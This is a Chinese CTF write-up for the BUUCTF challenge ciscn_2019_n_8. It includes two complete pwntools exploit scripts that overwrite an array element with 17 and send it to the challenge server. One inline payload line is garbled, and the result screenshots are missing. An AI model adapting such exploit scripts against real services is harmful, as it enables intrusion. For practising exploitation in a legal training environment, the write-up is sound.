不屬于棧溢出,應該是比較簡單的pwn,看懂代碼邏輯+使用pwntools
32位,開啟了Stack、NX、PIE保護
執行效果:
main函數
使用通義千問詢問的代碼解讀:
即當var數組的第十四個元素是17就可以
這里可以用兩種payload:
第一種:
payload = b’a’134 + p32(17) #qword/IDA在32位里面是4個字節,在64位是/8個字節
第二種:
payload = p32(17)*14
第一種對應的exp是:
from pwn import *
io = remote("node5.buuoj.cn",27250)
payload = b'a'*13*4 + p32(17)
io.sendlineafter("What's your name?\n",payload)
io.interactive()
執行結果:
但看網上帖子有的用這個exp沒辦法連通,解決辦法可以參考:[BUUCTF-pwn]——ciscn_2019_n_8_[ciscn 2019華南]pwn8-CSDN博客
第二種對應的exp是:
from pwn import *
io = remote("node5.buuoj.cn",27250)
payload = p32(17)*14
io.sendlineafter("What's your name?\n",payload)
io.interactive()
執行結果: